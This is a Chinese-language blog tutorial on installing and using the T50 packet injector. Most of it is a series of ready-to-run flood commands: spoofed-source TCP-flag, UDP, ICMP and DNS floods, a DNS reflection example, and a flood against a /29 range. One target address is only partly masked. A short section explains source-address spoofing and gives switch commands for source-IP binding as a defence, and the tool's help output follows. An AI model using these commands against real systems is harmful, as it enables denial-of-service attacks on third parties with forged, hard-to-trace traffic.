文章目录
T50 Gitlab地址(kali自带,ubuntu19.10测试可以安装,现在版本是5.8.7)
T50是一款网络压力测试工具,每秒发送令人难以置信的数据包,使其成为“首屈一指”的工具
(在github上全线下架,下面是gitlab的项目地址)只支持ipv4不支持ipv6
https://gitlab.com/fredericopissarra/t50
__________ ________ _____
|__ ___/| ____/ / _ \ the fastest packet injector.
| | |____ \ / /_\ \
| | / \\ \_/ \
|____| /________/\\_______/
T50是功能强大且独特的数据包注入器工具,它是唯一能够将协议(下面列出的协议)封装在通用路由封装协议(GRE)中的工具。
T50的主要区别在于,它能够使用一个SOCKET依次发送所有协议,并且能够修改网络路由,
从而使IT安全专业人员可以执行高级的“渗透测试”。
ICMP-Internet控制消息协议
IGMPv1-Internet组管理协议v1
IGMPv3-Internet组管理协议v3
TCP-传输控制协议
EGP-外部网关协议
UDP-用户数据报协议
RIPv1-路由信息协议v1
RIPv2-路由信息协议v2
DCCP-数据报拥塞控制协议
RSVP-资源保留协议
GRE-通用路由封装
IPSec-Internet协议安全性(AH / ESP)
EIGRP-增强的内部网关路由协议
OSPF-首先打开最短路径
ubuntu19.10 安装T50
apt install gcc make -y
wget https://gitlab.com/fredericopissarra/t50/-/archive/master/t50-master.tar.gz
tar xf t50-master.tar.gz
cd t50-master
make && make install
攻击实例介绍(注意 --flood 与 --threshold 不能一起使用哦)
伪造随机源对 目标tcp 8099进行攻击
t50 --flood --protocol TCP --dport 8099 ***.***.***.***
#抓包查看
#tcpdump -v -i enp1s0f1 tcp and port 8099 -s 0 -w T50-flood-tcp-dport-8099.cap
#数据包下载地址 https://pan.baidu.com/s/1DZdu3EHA1mlCquyXYfC0DQ 提取码:559l
伪造随机源对 目标udp 8099进行攻击
t50 --flood --protocol UDP --dport 8099 ***.***.***.***
#抓包查看
#tcpdump -v -i enp1s0f1 udp and port 8099 -s 0 -w T50-flood-udp-dport-8099.cap
#数据包下载地址 https://pan.baidu.com/s/1CsnEas__VStpjbwVlz-xKQ 提取码:cg7z
指定源ip(可随便指定,注意私网IP和127是不行的),对目标8099端口进行随机TCP flag攻击
t50 --flood --protocol TCP --saddr 1.1.1.1 --dport ***.***.***.***
#抓包查看
#tcpdump -v -i enp1s0f1 tcp and port 8099 -s 0 -w T50-saddr-tcp-dport-8099.cap
#数据包下载地址 https://pan.baidu.com/s/1EMuIGjCHTaYhzI42n77gkQ 提取码:z7y4
伪造随机源对 目标的8099 进行 tcp fin flag攻击
t50 --flood --protocol TCP --fin --dport 8099 *1*.*14.*1*.117
#抓包查看
#tcpdump -v -i enp1s0f1 tcp and port 8099 -s 0 -w T50-flood-tcp-fin-dport-8099.cap
#数据包下载地址 https://pan.baidu.com/s/1O8s49GI6yw_-kKve1Zozbw 提取码:85xw
伪造源对一个/29的网段进行TCP flag攻击
t50 --flood --protocol TCP --dport 60991 ***.***.***.***/29
谈谈为什么会打出伪造源的攻击流量,以及如何防御
如何会能打出伪造源的攻击流量
根本原因:
网络是基于目的地址路由的(即路由器接口进入数据包后,读取数据包中的目的IP,然后查询路由表&转发表,进而将数据送出去,整个过程只查询了数据包的目的地址),为了实现数据包快速转发,实现大吞吐率,基本不会对来源IP进行验证,不是不能验证数据包中源IP的合法性,也不是不能拦截,只是互联网中部署得较少(我知道存在这个验证拦截的网络是HK CN2 网络)(对于这种网络技术,若是你有过海外IDC的经验,当你把你的IP向运营商广播时,你就知道,部分运营商网络存在 IP白名单的东西,基本就是这种限制了,你向它BGP广播的IP,你不去过白,那么你的这个IP流量是无法从他的线路上通过的,有的表项为可以ping,但是tcp,udp不能使用)
如何防御伪造源的流量攻击
ISP运营商的做法
IDC运营商的做法
user-bind static ip-address 38.21.230.4 interface 10GE2/0/19
ip source check user-bind enable
教科书的使用示例
# 随机源IP,对目标192.168.1.1 发起随机TCP flag攻击
t50 --flood --protocol TCP 192.168.1.1
# 伪造固定源IP8.8.8.8,对目标192.168.1.1 发起随机TCP flag攻击
t50 --flood --protocol TCP --saddr 8.8.8.8 192.168.1.1
# 固定源IP,固定TCP flag攻击
t50 --flood --protocol TCP --fin --saddr 8.8.8.8 192.168.1.1
t50 --flood --protocol TCP --syn --saddr 8.8.8.8 192.168.1.1
t50 --flood --protocol TCP --rst --saddr 8.8.8.8 192.168.1.1
t50 --flood --protocol TCP --psh --saddr 8.8.8.8 192.168.1.1
t50 --flood --protocol TCP --ack --saddr 8.8.8.8 192.168.1.1
# 随机源IP,UDP攻击
t50 --flood --protocol UDP 192.168.1.1
# 固定源IP,DNS攻击
t50 --flood --protocol UDP --dport 53 192.168.1.1
# 随机源IP,DNS反射攻击
t50 --flood --protocol UDP --sport 53 192.168.1.1
# 随机源IP,ICMP攻击
t50 --flood --protocol ICMP 192.168.1.1
# 固定源IP,ICMP攻击
t50 --flood --protocol ICMP --saddr 8.8.8.8 192.168.1.1
附详细参数介绍 (t50 -h)
Usage: t50 <host[/cidr]> [options]
Common Options:
--threshold NUM Threshold of packets to send (default 1000)
--flood This option supersedes the 'threshold'
--encapsulated Encapsulated protocol (GRE) (default OFF)
-B,--bogus-csum Bogus checksum (default OFF)
--shuffle Shuffling for T50 protocol (default OFF)
-q,--quiet Disable INFOs
--turbo Extend the performance (default OFF)
-l,--list-protocols List all available protocols
-v,--version Print version and exit
-h,--help Display this help and exit
GRE Options:
--gre-seq-present GRE sequence # present (default OFF)
--gre-key-present GRE key present (default OFF)
--gre-sum-present GRE checksum present (default OFF)
--gre-key NUM GRE key (default RANDOM)
--gre-sequence NUM GRE sequence # (default RANDOM)
--gre-saddr ADDR GRE IP source IP address (default RANDOM)
--gre-daddr ADDR GRE IP destination IP address (default RANDOM)
DCCP/TCP/UDP Options:
--sport NUM DCCP|TCP|UDP source port (default RANDOM)
--dport NUM DCCP|TCP|UDP destination port (default RANDOM)
TCP Options:
--ack-seq NUM TCP ACK sequence # (default RANDOM)
--sequence NUM TCP SYN sequence # (default RANDOM)
--data-offset NUM TCP data offset (default 5)
-F,--fin TCP FIN flag (default OFF)
-S,--syn TCP SYN flag (default OFF)
-R,--rst TCP RST flag (default OFF)
-P,--psh TCP PSH flag (default OFF)
-A,--ack TCP ACK flag (default OFF)
-U,--urg TCP URG flag (default OFF)
-E,--ece TCP ECE flag (default OFF)
-C,--cwr TCP CWR flag (default OFF)
-W,--window NUM TCP Window size (default NONE)
--urg-pointer NUM TCP URG pointer (default NONE)
--mss NUM TCP Maximum Segment Size (default NONE)
--wscale NUM TCP Window Scale (default NONE)
--tstamp NUM:NUM TCP Timestamp (TSval:TSecr) (default NONE)
--sack-ok TCP SACK-Permitted (default OFF)
--ttcp-cc NUM T/TCP Connection Count (CC) (default NONE)
--ccnew NUM T/TCP Connection Count (CC.NEW) (default NONE)
--ccecho NUM T/TCP Connection Count (CC.ECHO) (default NONE)
--sack NUM:NUM TCP SACK Edges (Left:Right) (default NONE)
--md5-signature TCP MD5 signature included (default OFF)
--authentication TCP-AO authentication included (default OFF)
--auth-key-id NUM TCP-AO authentication key ID (default 1)
--auth-next-key NUM TCP-AO authentication next key (default 1)
--nop TCP No-Operation (default EOL)
IP Options:
-s,--saddr ADDR IP source IP address (default RANDOM)
--tos NUM IP type of service (default 0x40)
--id NUM IP identification (default RANDOM)
--frag-offset NUM IP fragmentation offset (default 0)
--ttl NUM IP time to live (default 255)
--protocol PROTO IP protocol T50|UDP|ICMP|TCP(default)
ICMP Options:
--icmp-type NUM ICMP type (default 8)
--icmp-code NUM ICMP code (default 0)
--icmp-gateway ADDR ICMP redirect gateway (default RANDOM)
--icmp-id NUM ICMP identification (default RANDOM)
--icmp-sequence NUM ICMP sequence # (default RANDOM)
EGP Options:
--egp-type NUM EGP type (default 3)
--egp-code NUM EGP code (default 3)
--egp-status NUM EGP status (default 1)
--egp-as NUM EGP autonomous system (default RANDOM)
--egp-sequence NUM EGP sequence #
如果文章对你有帮助,欢迎点击上方按钮打赏作者
暂无评论